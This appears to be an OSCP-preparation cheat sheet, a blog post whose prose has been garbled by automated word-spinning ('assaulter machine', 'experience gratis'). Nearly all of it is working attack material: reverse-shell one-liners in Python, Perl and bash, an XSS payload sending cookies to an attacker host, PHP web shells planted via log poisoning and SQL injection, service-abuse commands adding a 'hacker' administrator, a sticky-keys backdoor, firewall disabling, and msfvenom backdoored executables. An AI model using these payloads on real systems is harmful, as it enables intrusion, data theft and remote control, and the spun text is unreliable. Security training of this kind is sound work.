I desire to portion a twosome of things that I intend helped me preparing the Offensive Security Certified Professional - OSCP certification together with what I establish useful during the labs together with exam. If you lot have got whatever questions, experience gratis to contact me.
Don't forget to:
- Follow the courseware offset together with therefore start practicing inwards the labs.
- Use additional sources to larn more.
- Join the offensive safety PWK forums together with social media together with speak to other people.
Tips
Enable service on every reboot:update-rc.d <[SERVICE]> enable cat index.html | grep "href=" | cutting -d "/" -f3| grep "<[DOMAIN]>" | cutting -d '"' -f1 | form -u Netcat
Interact alongside application:nc -nv <[IP]> <[PORT]> nc -nlvp <[PORT]> nc -nlvp <[PORT]> > <[FILE]> nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]> Bind vs Reverse Shell
Bind Shell:
Bob needs Alice's help. Bob laid a listener on port 4444 alongside -e parameter:
(BOB): nc -nlvp <[PORT]> -e cmd.exe (ALICE): nc -nv <[BOB_IP]> <[PORT]> Alice needs Bob's help. Since Alice is beyond firewall it is impossible to BOB to accomplish Alice. So Alice practise a contrary shell:
(ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash (BOB): nc -nlvp <[PORT]> Zone Transfer
dnsrecon -t axfr -d <[DOMAIN]> Nmap
nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]> SMB
nbtscan <[SUBNET]> nmap -p139,445 --script smb-enum-users <[SUBNET]> nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]> enum4linux smbclient -L <[IP]> -N smbclient \\<[IP]>\share -N SMTP
nmap -p25 <[SUBNET]> --open nc -nv IP 25 VRFY <[USERNAME]> SNMP
Steps: nmap scan udp 161, practise target IP list, practise community listing file, purpose onesixtyone + snmpwalknmap -sU --open -p161 <[SUBNET]> --open onesixtyone -c community -i <[SMNP_IP_LIST]> snmpwalk -c world -v1 <[IP]> <mib-values> 1.3.6.1.2.1.25.1.6.0 System Processes 1.3.6.1.2.1.25.4.2.1.2 Running Programs 1.3.6.1.2.1.25.4.2.1.4 Processes Path 1.3.6.1.2.1.25.2.3.1.4 Storage Units 1.3.6.1.2.1.25.6.3.1.2 Software Name 1.3.6.1.4.1.77.1.2.25 User 1.3.6.1.2.1.6.13.1.3 TCP Local Ports File Transfer Linux
Netcat:On Victim machine (client): nc -nlvp 4444 > <[FILE]> On Attacker machine (server): nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]> curl -O http://<[IP]>/<[FILE]> wget http://<[IP]>/<[FILE]> wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]> File Transfer Windows
TFTP (Installed past times default upwardly to Windows XP together with 2003, In Windows 7, 2008 together with inwards a higher identify needs to endure explicitly added. For this argue tftp non ideal file transfer protocol inwards near situations.)On assaulter machine: mkdir tftp atftpd --deamon --port 69 tftp cp <[FILE]> tftp On victim machine shell: tftp -i <[IP]> GET <[FILE]> On assaulter machine:
(UNA TANTUM) Install a ftp server. apt-get install pure-ftpd (UNA TANTUM) Create novel user for PureFTPD (see script setup-ftp.sh) (USER demo, PASS demo1234) groupadd ftgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd present -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome /etc/init.d/pure-ftpd restart (UNA TANTUM) chmod 755 setup-ftp.sh echo opened upwardly <[IP]> 21 > ftp.txt echo USER present >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET nc.exe >> ftp.txt echo goodbye >> ftp.txt ftp -v -n -s:ftp.txt On victim machine shell:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs & echo StrFile = WScript.Arguments.Item(1) >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs & echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs & echo Err.Clear >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs & echo http.Open "GET", strURL, False >> wget.vbs & echo http.Send >> wget.vbs & echo varByteArray = http.ResponseBody >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs & echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs & echo strData = "" >> wget.vbs & echo strBuffer = "" >> wget.vbs & echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs & echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs & echo Next >> wget.vbs & echo ts.Close >> wget.vbs cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]> On victim machine shell:
echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >> wget.ps1 echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1 echo $file = "evil.exe" >> wget.ps1 echo $webclient.DownloadFile($url,$file) >> wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 On assaulter machine:
cp <[FILE]> . upx -9 <[FILE]> (for compression) cp /usr/share/windows-binaries/exe2bat.exe . vino exe2bat <[FILE]> <[FILE.txt]> Paste the content of <[FILE.txt]> XSS
Stole cookie from xss:On assaulter machine laid listener (nc -nlvp <[PORT]>) On victim website <script>new Image().src="http://<[IP]>:<[PORT]>/test.php?output="+document.cookie;</script> LFI/RFI
Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) together with mail <?php echo shell_exec($_GET['cmd']);?>, afterward that stimulate to include log file for code execution. &cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log SQL Injection
Bse:any' or 1=1 boundary 1;-- order past times 1, lodge past times 2, ... UNION conduct 1,2,3,4,5,6 UNION conduct 1,2,3,4,table_name,6 FROM information_schema.tables <[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 marriage ceremony conduct 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php' Buffer Overflow
/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]> /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -<[ADDRESS]> Privilege Escalation
Vulnerable Servicesaccesschk.exe -uwcqv "Authenticated Users" * /accepteula sc qc <[VULNERABLE_SERVICE]> sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= "" sc config <[VULNERABLE_SERVICE]> start= "auto" sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add" sc halt <[VULNERABLE_SERVICE]> sc start <[VULNERABLE_SERVICE]> sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrator hacker /add" sc halt <[VULNERABLE_SERVICE]> sc start <[VULNERABLE_SERVICE]> sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add" sc halt <[VULNERABLE_SERVICE]> sc start <[VULNERABLE_SERVICE]> reg.exe add together "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f Then ctrl+alt+canc together with start virtual keyboard Pass the hash
Export SMBHASH=<[HASH]> pth-winexe -U administrator% //<[IP]> cmd Cracking
Medusamedusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND" ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]> Firewall
Enable Remote Desktop:reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh firewall laid service remotedesktop enable reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh firewall laid service remoteadmin enable netsh firewall set opmode disable set CMD "net user hacker Hacker123 /add & internet localgroup administrators hacker /add & internet localgroup \"Remote Desktop Users\" hacker /add & reg add together \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add together \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable" Backdooring EXE Files
msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i three -b "\x00" -f exe -o <[FILE_NAME]> Binaries payloads
Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]> msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]> Web payloads
PHP:msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]> truthful cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]> msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]> msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f nation of war > <[FILE_NAME.war]> Scripting Payloads
Python:msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]> msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]> msfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]> Shellcode
For all shellcode encounter ‘msfvenom –help-formats’ for information every bit to valid parameters. Msfvenom volition output code that is able to endure cutting together with pasted inwards this linguistic communication for your exploits.Linux Based Shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]> Staged vs Non-Staged Payloads
Staged payload: (useful for bof) (need multi_handler metasploit inwards lodge to works)Windows/shell/reverse_tcp msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]> Windows/shell_reverse_tcp msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]> Handlers
Metasploit handlers tin endure great at chop-chop setting upwardly Metasploit to endure inwards a seat to have your incoming shells. Handlers should endure inwards the next format.use exploit/multi/handler laid PAYLOAD <[PAYLOAD_NAME]> laid LHOST <[IP]> laid LPORT <[PORT]> laid ExitOnSession imitation exploit -j -z Shell Spawning
Python:python -c 'import pty; pty.spawn("/bin/sh")' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' echo os.system('/bin/bash') /bin/sh -i exec 5<>/dev/tcp/<[IP]>/<[PORT]> truthful cat <&5 | spell read line; practise $line 2>&5 >&5; done perl —e 'exec "/bin/sh";' perl: exec "/bin/sh"; perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' mknod /tmp/yyy p && /bin/bash 0</tmp/yyy | telnet <[IP]> <[PORT]> 1>/tmp/yyy ruby: exec "/bin/sh" lua: os.execute('/bin/sh') exec "/bin/sh" :!bash :set shell=/bin/bash:shell !sh 